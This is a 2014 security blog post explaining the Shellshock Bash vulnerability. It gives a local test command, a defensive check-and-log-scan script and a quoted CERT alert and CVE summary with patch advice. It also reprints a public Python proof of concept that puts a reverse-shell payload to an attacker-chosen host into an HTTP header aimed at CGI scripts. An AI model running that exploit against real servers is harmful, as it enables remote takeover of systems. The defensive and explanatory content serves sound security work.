Shellshock (Bash bug) vulnerability – critical security vulnerability discovered in Bash (Bourne-Again Shell)

// September 25th, 2014 // Hacking and Security

Example of the Shellshock (bash bug) bash security vulnerability

If your Linux/Unix (or Apple Mac OS X) applications are running with root permissions and call on the shell, this vulnerability (called “Bash Bug” or “$hellshock”) is huge as it allows an attacker to remotely execute shell commands by attaching malicious code (i.e. using a “specially crafted attack”) into environment variables used by the OS. The flaw is present in GNU Bash versions 1.14 through 4.3 (yup, this bug’s been around for 22 years now). Basically the flaw allows the attacker to create environment variables that contain trailing code – and the code gets executed as soon as the bash shell is invoked. And yes, it’s exploitable over the network.

More specifically, when assigning a function to a variable, trailing code in the function definition will be executed. For instance, enter this command:

env x='() { :;}; echo am i vulnerable to shellshock? Sorry, but yes, you are pawned!' bash -c "echo this is an echo test"

And hope you don’t see this:

am i vulnerable to shellshock? Sorry, but yes, you are pawned!
this is an echo test

But instead, see this:

bash: warning: x: ignoring function definition attempt
bash: error importing function definition for `x'
this is an echo test

As you can see, the bug relates to how Bash processes environment variables passed in by the operating system. Code trailing the function definition (the echo command in the example above) is erroneously executed.

Here’s another “proof of concept” snippet of code that has already been released on the Internet:

# Python 2 (httplib and print statements); sends one HTTP request whose
# "test" header carries a Bash function definition with a trailing command
import httplib, urllib, sys

if (len(sys.argv) < 4):
    print "Usage: %s <host> <vulnerable CGI> <attackhost/IP>" % sys.argv[0]
    print "Example: %s localhost /cgi-bin/test.cgi 10.0.0.1/8080" % sys.argv[0]
    exit(0)

conn = httplib.HTTPConnection(sys.argv[1])
reverse_shell = "() { ignored;};/bin/bash -i >& /dev/tcp/%s 0>&1" % sys.argv[3]

# the web server exports request headers as CGI environment variables,
# which is how the crafted value reaches the vulnerable bash
headers = {"Content-type": "application/x-www-form-urlencoded",
           "test": reverse_shell}
conn.request("GET", sys.argv[2], headers=headers)
res = conn.getresponse()
print res.status, res.reason
data = res.read()
print data

Lest you think to yourself, bash, bah, I never use it (huh?), I’ll remind you that bash is a common shell for evaluating and executing commands from other programs such as web servers (e.g. CGI scripts through mod_cgi and mod_cgid) and mail servers, and in fact this attack vector has already been found in use by an active exploit against web servers (as of 9/25/14). If your default shell is configured as Bash, this attack can be used against network-based resources. In addition, the attack vector can be initiated through secure shell sessions, telnet sessions, the CUPS printing system, as well as (potentially) embedded devices, Android devices, etc.
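To make the two defender-side points above concrete (checking whether a shell imports the trailing command, and spotting the probe when it arrives over HTTP), here is an added POSIX shell example. It is not code from the original post or from CERT: the check function wraps the same environment-variable probe shown earlier, and the log functions scan Apache combined-format lines for the "() {" function-definition prefix that every Shellshock request must carry in some header. The log lines are constructed for this example; the function names and exit codes are this example's own choices.

```shell
#!/bin/sh
# Added example (not from the original post). Two defender-side tools:
#  1. shellshock_check: runs the env-variable probe shown on the page against a
#     given shell binary and reports whether the trailing command executed.
#  2. count_shellshock_requests / shellshock_sources: detection over access log
#     lines for the "() {" prefix. CGI servers export the request line, Referer
#     and User-Agent as environment variables, so every field is inspected.
# The log lines in sample_log are constructed for this example.

# Exit status: 0 = trailing command ignored (patched, or not bash),
#              1 = trailing command executed (vulnerable to CVE-2014-6271),
#              2 = shell binary could not be found.
shellshock_check() {
    shell_bin="${1:-bash}"
    command -v "$shell_bin" >/dev/null 2>&1 || return 2
    # A patched bash prints only "probe" (its warning goes to stderr, which we
    # discard); a vulnerable one also runs the echo that trails the function.
    out=$(env x='() { :;}; echo VULNERABLE' "$shell_bin" -c 'echo probe' 2>/dev/null)
    case "$out" in
        *VULNERABLE*) return 1 ;;
        *) return 0 ;;
    esac
}

# Function-definition prefix; the space between "()" and "{" is optional,
# since probes seen in the wild sometimes omit it.
SHELLSHOCK_RE='()[[:space:]]*{'

# Reads log lines on stdin, prints the number carrying the prefix anywhere.
count_shellshock_requests() {
    grep -c "$SHELLSHOCK_RE" || true   # grep -c exits 1 when the count is 0
}

# Reads log lines on stdin, prints unique client addresses (field 1 of the
# combined log format) that sent a probe, one per line.
shellshock_sources() {
    grep "$SHELLSHOCK_RE" | cut -d' ' -f1 | sort -u
}

# Constructed Apache combined-format lines: two probes (one in User-Agent,
# one in Referer without the space) and two ordinary requests.
sample_log() {
    cat <<'EOF'
10.0.0.5 - - [25/Sep/2014:10:12:01 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 200 512 "-" "() { :;}; echo probe"
10.0.0.6 - - [25/Sep/2014:10:12:05 +0000] "GET /index.html HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
10.0.0.7 - - [25/Sep/2014:10:12:09 +0000] "GET /cgi-bin/status.cgi HTTP/1.1" 200 210 "() {:;}; echo probe" "curl/7.37.0"
10.0.0.8 - - [25/Sep/2014:10:12:12 +0000] "GET /about.html HTTP/1.1" 404 230 "-" "Mozilla/5.0 (X11)"
EOF
}

# Stand-alone run: report on the local bash, then on the constructed log.
rc=0
shellshock_check bash || rc=$?
case "$rc" in
    0) echo "bash: trailing command ignored (not vulnerable to CVE-2014-6271)" ;;
    1) echo "bash: trailing command EXECUTED (vulnerable to CVE-2014-6271)" ;;
    2) echo "bash: binary not found" ;;
esac
echo "probe requests in sample log: $(sample_log | count_shellshock_requests)"
echo "probe sources:"
sample_log | shellshock_sources
```

The check only covers the original CVE-2014-6271 behaviour; a bash that passes it can still be affected by the incomplete-fix follow-up CVE-2014-7169 discussed below, so it is a triage aid, not a substitute for the vendor patch. Against a real log, replace sample_log with `cat /var/log/apache2/access.log` or the equivalent path for your server.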

NIST has rated the vulnerability as “10 out of 10” for impact and “low” for complexity. It doesn’t get any worse than that. The fix, of course, is to patch bash, and vendors are rolling out the patches now. Note that the initial patch for the vulnerability was incorrect and still allowed the attack vector (which means there are two CVE (Common Vulnerabilities and Exposures) IDs for this vulnerability). Until you can get a good patchset for the bug, you can set another shell as the default system shell (use the chsh or ypchsh commands to change the shell), and if you’re running a website, make sure you sanitize your input well. If possible, just get away from CGI scripts that call on the shell completely; they’re old hat. If you change your shell, remember that the syntax differs between shells, so changing out the shell could introduce additional problems.

Here’s the complete CERT alert:

Systems Affected

  • GNU Bash through 4.3.
  • Linux, BSD, and UNIX distributions including but not limited to:

Overview

A critical vulnerability has been reported in the GNU Bourne Again Shell (Bash), the common command-line shell used in most Linux/UNIX operating systems and Apple’s Mac OS X. The flaw could allow an attacker to remotely execute shell commands by attaching malicious code in environment variables used by the operating system [1]. The United States Department of Homeland Security (DHS) is releasing this Technical Alert to provide further information about the GNU Bash vulnerability.

Description

GNU Bash versions 1.14 through 4.3 contain a flaw that processes commands placed after function definitions in the added environment variable, allowing remote attackers to execute arbitrary code via a crafted environment which enables network-based exploitation. [2, 3]

Critical instances where the vulnerability may be exposed include: [4, 5]

  • Apache HTTP Server using mod_cgi or mod_cgid scripts either written in bash, or spawn subshells.
  • Override or Bypass ForceCommand feature in OpenSSH sshd and limited protection for some Git and Subversion deployments used to restrict shells and allows arbitrary command execution capabilities.
  • Allow arbitrary commands to run on a DHCP client machine, various Daemons and SUID/privileged programs.
  • Exploit servers and other Unix and Linux devices via Web requests, secure shell, telnet sessions, or other programs that use Bash to execute scripts.

Impact

This vulnerability is classified by industry standards as “High” impact with CVSS Impact Subscore 10 and “Low” on complexity, which means it takes little skill to perform. This flaw allows attackers to provide specially crafted environment variables containing arbitrary commands that can be executed on vulnerable systems. It is especially dangerous because of the prevalent use of the Bash shell and its ability to be called by an application in numerous ways.

Solution

Patches have been released to fix this vulnerability by major Linux vendors for affected versions. Solutions for CVE-2014-6271 do not completely resolve the vulnerability. It is advised to install existing patches and pay attention for updated patches to address CVE-2014-7169.

Many UNIX-like operating systems, including Linux distributions, BSD variants, and Apple Mac OS X include Bash and are likely to be affected. Contact your vendor for updated information. A list of vendors can be found in CERT Vulnerability Note VU#252743 [6].

US-CERT recommends system administrators review the vendor patches and the NIST Vulnerability Summary for CVE-2014-7169, to mitigate damage caused by the exploit.

And here’s the CVE summary for CVE-2014-7169:

Vulnerability Summary for CVE-2014-7169

Original release date: 09/24/2014
Last revised: 09/25/2014
Source: US-CERT/NIST

Overview

GNU Bash through 4.3 bash43-025 processes trailing strings after certain malformed function definitions in the values of environment variables, which allows remote attackers to write to files or possibly have unknown other impact via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution. NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-6271.

Impact

CVSS Severity (version 2.0):
CVSS v2 Base Score: 10.0 (HIGH) (AV:N/AC:L/Au:N/C:C/I:C/A:C)
Impact Subscore: 10.0
Exploitability Subscore: 10.0
CVSS Version 2 Metrics:
Access Vector: Network exploitable
Access Complexity: Low
Authentication: Not required to exploit
Impact Type: Allows unauthorized disclosure of information; Allows unauthorized modification; Allows disruption of service
